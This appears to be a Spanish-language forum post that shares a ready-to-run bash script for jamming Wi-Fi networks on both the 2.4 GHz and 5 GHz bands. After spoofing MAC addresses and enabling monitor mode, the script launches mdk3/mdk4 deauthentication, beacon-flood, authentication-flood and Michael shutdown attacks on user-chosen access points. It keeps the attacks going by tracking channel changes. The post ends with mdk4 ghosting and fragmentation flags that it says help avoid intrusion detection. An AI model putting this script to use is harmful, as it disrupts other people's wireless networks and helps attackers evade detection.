salu2
Atencion si te da una salida mala devolver interfaz a estado normal:
airmon-ng verficamos interfaz en mon cual tenemos
iw interfazmon del
ifconfig interfaz down
macchanger -p interfaz
ifconfig interfaz up
fijate en la deteccion del cambio de canal es por medio de iw
al igual que el poner en modo monitor las ifaces uso iw
ademas de un archivo en awk que hice a cachos de otros que es que te presenta en pantalla la redes disponibles por medio de awk se hace todo mas sencillo
para esto como he dicho 2 tarjetas y una compatible con 5g
#!/bin/bash
###########################################################################
################ Ddoos atomatic dual band Wlan ############################
############### Based; Apfuker.py and Dos Koala ###########################
###########################################################################
verde="\033[1;32m"
amarillo="\033[1;33m"
azul="\033[1;34m"
rojoC="\033[1;31m"
grisC="\033[0;37m"
############################
f_empieza() {
mkdir /tmp/Ddoss
Ddoos0="/tmp"
Ddoss="/tmp/Ddoss"
echo $$ >$Ddoss/terminal.pid
sleep 2 ;
echo "
\$1 ~ /^BSS/ {
if(\$2 !~ /Load:/) {
gsub(\"(\\\(.*)\", \"\", \$2)
MAC = toupper(\$2)
wifi[MAC][\"enc\"] = \"OPEN\"
}
}
\$1 == \"SSID:\" {
FS=\" \"
\$0=\$0
sub(\" \", \"\", \$2)
wifi[MAC][\"SSID\"] = \$2
FS=\" \"
\$0=\$0
}
\$1 == \"DS\" {
wifi[MAC][\"Ch\"] = \$5
}
END {
for (w in wifi) {
printf \"%-20s\t%s\t%s\n\", w, wifi[w][\"SSID\"], wifi[w][\"Ch\"]
}
}
"> "/tmp/Ddoss/scan.awk"
sleep 2 ;
service stop networkmanager
sleep 2 ;
airmon-ng check kill
echo -e "\e[1;32m #############################\e[0m"
echo -e "$verde # "$azul"Ddoos Automatic dual band$verde #"
echo -e "\e[1;32m #############################\e[0m"
echo
echo -e $blue " Seleciona interfaz para ataquar banda 5ghz :"
echo -e $amarillo
interfaces=`ip link|egrep "^[0-9]+"|cut -d ':' -f 2 |awk {'print $1'}|grep -v lo|grep -v eth*`
select interface_5ghz in $interfaces; do
break;
done
echo -e "\e[1;32m\e[0m"
ifconfig ${interface_5ghz} down
sleep 2 ;
macchanger -m c0:1b:88:a1:0a:83 ${interface_5ghz}
sleep 2 ;
ifconfig ${interface_5ghz} up
sleep 2 ;
iw ${interface_5ghz} interface add ${interface_5ghz}mon type monitor
sleep 2 ;
echo -e "\e[1;32m --Vamos a scanear redes 10 seg.--\e[0m"
sudo iw ${interface_5ghz} scan | awk -f $Ddoss/scan.awk > $Ddoss/Redes-Disponibles.txt
sleep 10 ;
echo -e "\e[1;32m___________________________________________\e[0m"
echo -e $azul
cat $Ddoss/Redes-Disponibles.txt
echo -e "\e[1;32m___________________________________________\e[0m"
unset essid5GHZ
while [ -z "${essid5GHZ}" ]; do read -p " Nombre de la Red 5GHz " essid5GHZ; done
echo -e "\e[1;34m[*]\e[0m OK"
sleep 2;
unset canal5GHZ
while [ -z "$canal5GHZ" ]; do read -p " Canal de 5ghz :" canal5GHZ; done
if (($canal5GHZ >= 1 && $canal5GHZ <= 173)); then
echo -e "\e[1;34m[*]\e[0m OK."
else
echo -e "\n\e[1;31m[-]\e[0m ERROR: invalid channel !\n"
sleep 2;
#iw dev ${int} set channel $canal
f_floodinterface
fi
unset BSSIDghz5
while [ -z "${BSSIDghz5}" ]; do read -p " MAC o BSSID para 5GHz: " BSSIDghz5; done
echo -e "\e[1;34m[*]\e[0m OK"
#iw dev ${int1} set channel ${canal5GHZ}
sleep 2;
echo "$BSSIDghz5" > $Ddoss/blacklist-5ghz.txt
blacklist_5ghz=$Ddoss/blacklist-5ghz.txt
f_floodinterface
}
################################################################
f_floodinterface(){
# fonction qui demande les infos a l'utilisateur
echo
echo
echo -e "\e[1;32m Selecciona Interfaz para Ataque 2.4ghz\e[0m"
echo -e $amarillo
interface2=`ip link|egrep "^[0-9]+"|cut -d ':' -f 2 | awk {'print $1'}|grep -v lo|grep -v eth*`
select interface_2ghz in $interface2; do
break;
done
echo -e "\e[1;32m \e[0m"
ifconfig ${interface_2ghz} down
sleep 2 ;
macchanger -r ${interface_2ghz}
sleep 2 ;
ifconfig ${interface_2ghz} up
sleep 2 ;
# Start Fake Ap interface
iw ${interface_2ghz} interface add ${interface_2ghz}mon type monitor
${interface_2ghz}mon=mon_2g
echo -e "\e[1;32m___________________________________________\e[0m"
echo -e $azul
cat $Ddoss/Redes-Disponibles.txt
echo -e "\e[1;32m___________________________________________\e[0m"
echo
unset ESSID
while [ -z "${ESSID}" ]; do read -p " Nombre de AP 2.4ghz :" ESSID; done
echo -e "\e[1;34m[*]\e[0m OK"
unset canal
while [ -z "$canal" ]; do read -p " Canal de 2.4ghz :" canal; done
if (($canal >= 1 && $canal <= 13)); then
echo -e "\e[1;34m[*]\e[0m OK."
else
echo -e "\n\e[1;31m[-]\e[0m ERROR: invalid channel !\n"
sleep 2;
#iw dev ${int} set channel $canal
f_floodinterface
fi
unset seconde
while [ -z "$seconde" ]; do read -p " Tiempo antes de checkear el canal del AP en seg(debe ser mas 120.): " seconde; done
if (($seconde >= 120 && $seconde <= 259200)); then
echo -e "\e[1;34m[*]\e[0m OK."
else
echo -e "\n\e[1;31m[-]\e[0m ERROR: tu tiempo no es corecto !\n"
sleep 4;
f_floodinterface
fi
read -ep " BSSID de AP 2.4ghz : " BSSID
echo " "
while !(echo $BSSID | tr a-f A-F | egrep -q "^([0-9a-fA-F]{2}:){5}[0-9a-fA-F]{2}$")
do
echo -e " $rojo Erreur : BSSID no valid $colorbase"
echo " "
read -ep " BSSID of target network : " BSSID
echo " "
done
echo "$BSSID" > $Ddoss/blacklist2.txt
blacklist2=$Ddoss/blacklist2.txt
f_floodinstantane # une fois les infos demandés on passe a la boucle 1 qui est la fonction floodinstantane (voir plus bas)
}
##################################
f_checkap(){
echo -e $amarillo " !Parando ataque para verificar bien el cambio de canal¡"
kill `cat $Ddoss/mdk3.pid`
kill `cat $Ddoss/beacon-flood.pid`
kill `cat $Ddoss/auth-dos.pid`
kill `cat $Ddoss/flood-amok.pid`
kill `cat $Ddoss/michael-shoutdown.pid`
##################################
rm -rf $Ddoss/mdk3.pid
rm -rf $Ddoss/beacon-flood.pid
rm -rf $Ddoss/auth-dos.pid
rm -rf $Ddoss/flood-amok.pid
rm -rf $Ddoss/michael-shoutdown.pid
rm -rf $Ddoss/Redes-Disponibles.txt
echo -e $amarillo " !Esperemos 30 seg. volvemos a scanear redes para verficar canales¡"
sleep 10 ;
canal5GHZ=`iw ${interface_5ghz} scan | awk -f $Ddoss/scan.awk | grep "$BSSIDghz5" | awk '{print $3}' | grep "."` > "$Ddoss/Redes-Disponibles.txt"
sleep 10 ;
canal=`iw ${interface_2ghz} scan | awk -f $Ddoss/scan.awk |grep "$BSSID" "$Ddoss/Redes-Disponibles.txt" | awk '{print $3}' | grep "."`
sleep 10 ;
f_floodinstantane
}
###################################
f_floodinstantane(){
echo -e "\e[1;32m #############################\e[0m"
echo -e "$verde # "$azul"Ddoos Automatic dual band$verde #"
echo -e "\e[1;32m #############################\e[0m"
# boucle 1 qui test le contenu du fichier en appelant la fonction boucle 2 toute les x seconde (fonction juste au dessus f_checkap)
echo -e "Iniciando el DoS..(El Cambio de Canal sera Verficado en el Tiempo Ingresado)"
echo -e $rojoC"Parar el ataque Ctrl+C"
sleep 1;
xterm -hold -bg '#000000' -fg '#3A94FF' -e mdk3 ${interface_2ghz}mon d -b $blacklist2 -c ${canal} -s 1024 &> /dev/null &
echo $! >$Ddoss/mdk3.pid
echo -e $verde "Lanzando MDK3 $azul${ESSID} $verde| $azul${BSSID} $verde| $azul${canal} $verde|"
sleep 10;
xterm -hold -bg '#000000' -fg '#3A94FF' -e mdk4 ${interface_5ghz}mon b -n ${essid5GHZ} -b g -w t -m -c ${canal5GHZ} &> /dev/null &
echo $! >$Ddoss/beacon-flood.pid
echo -e "Launching beacon flood $azul${essid5GHZ} $verde| $azul$BSSIDghz5 $verde| $azul${canal5GHZ} $verde|"
sleep 2;
xterm -hold -bg '#000000' -fg '#3A94FF' -e mdk4 ${interface_5ghz}mon a -i ${BSSIDghz5} -m -s 1024 &> /dev/null &
echo $! >$Ddoss/auth-dos.pid
echo -e "Launching Auth DoS against | $azul${BSSIDghz5} $verde|"
sleep 2;
xterm -hold -bg '#000000' -fg '#3A94FF' -e mdk4 ${interface_5ghz}mon d -c ${canal5GHZ} -b $blacklist_5ghz -E ${essid5GHZ} -s 1024 -x &> /dev/null &
echo $! >$Ddoss/flood-amok.pid
echo -e "Launching Deauth Flood Amok | $azul${BSSIDghz5} $verde| $azul${canal5GHZ} $verde|"
sleep 2 ;
xterm -hold -bg '#000000' -fg '#3A94FF' -e mdk4 ${interface_5ghz}mon m -t ${BSSIDghz5} -j -w 1 -n 1024 -s 1024 &> /dev/null &
echo $! >$Ddoss/michael-shoutdown.pid
echo -e "Launching Michael 'Shutdown' Exploitation | $azul${BSSIDghz5} $verde|"
sleep 2 ;
while : ; do
sleep ${seconde} ; f_checkap ; done
}
#####################################################
trap f_checkexit SIGINT
f_checkexit(){
echo -e $amarillo " !ESPERA VAMOS A LIMPIAR¡"
if [ "${interface_2ghz}" ]; then
iw ${interface_2ghz}mon del
else
echo -e "Interfaz no encontrada"
fi
sleep 2 ;
if [ "${interface_2ghz}" ]; then
ifconfig ${interface_2ghz} down
else
echo -e "Interfaz no encontrada"
fi
sleep 2 ;
if [ "${interface_2ghz}" ]; then
macchanger -p ${interface_2ghz}
else
echo -e "Interfaz no encontrada"
fi
sleep 2 ;
if [ "${interface_2ghz}" ]; then
ifconfig ${interface_2ghz} up
else
echo -e "Interfaz no encontrada"
fi
sleep 2 ;
if [ "${interface_5ghz}" ]; then
iw ${interface_5ghz}mon del
else
echo -e "Interfaz no encontrada"
fi
sleep 2 ;
if [ "${interface_5ghz}" ]; then
ifconfig ${interface_5ghz} down
else
echo -e "Interfaz no encontrada"
fi
sleep 2 ;
if [ "${interface_5ghz}" ]; then
macchanger -p ${interface_5ghz}
else
echo -e "Interfaz no encontrada"
fi
sleep 2 ;
if [ "${interface_5ghz}" ]; then
ifconfig ${interface_5ghz} up
else
echo -e "Interfaz no encontrada"
fi
sleep 2 ;
service start networkmanager
cd /tmp/Ddoss
rm -rf *.pid
rm -rf *.txt
rm -rf *.log
cd
rm -rf /tmp/Ddoss
echo -e "\e[1;32m TERMINADO DE LIMPIAR Y LENAVATAR INTERFACES...\e[0m"
exit 2> /dev/null
}
f_activedos(){
clear
echo "1. Dos"
read -p "Choix: " menuchoix
case ${menuchoix} in
1) unset clean; f_empieza ;;
*) f_activedos ;;
esac
}
# run as root
if [ "$(id -u)" != "0" ]; then
echo -e "\e[1;31m[!]\e[0m No tienes permisos ...!" 1>&2
exit 1
else
clean=1
f_empieza
fi
con un copia y pega se puede usar
----------
estoy con esto en mdk4 bueno yo para mi si se usarlo pero claro aqui ya va potencia de antena y señal
--ghost <period>,<max_rate>,<min_txpower> after your attack mode identifier to enable ghosting!
<period> : How often (in ms) to switch rate/power
<max_rate> : Maximum Bitrate to use in MBit
<min_txpower> : Minimum TX power in dBm to use
-------------------------------
--frag <min_frags>,<max_frags>,<percent> after your attack mode identifier to fragment all outgoing packets, possibly avoiding lots of IDS!
<min_frags> : Minimum fragments to split packets into
<max_frags> : Maximum amount of fragments to create
<percent> : Percantage of packets
yo le tiro y mdk4 no se queja es poner despues de la eleccion del tipo de ataque el ghost y los frag de paquets de reenvio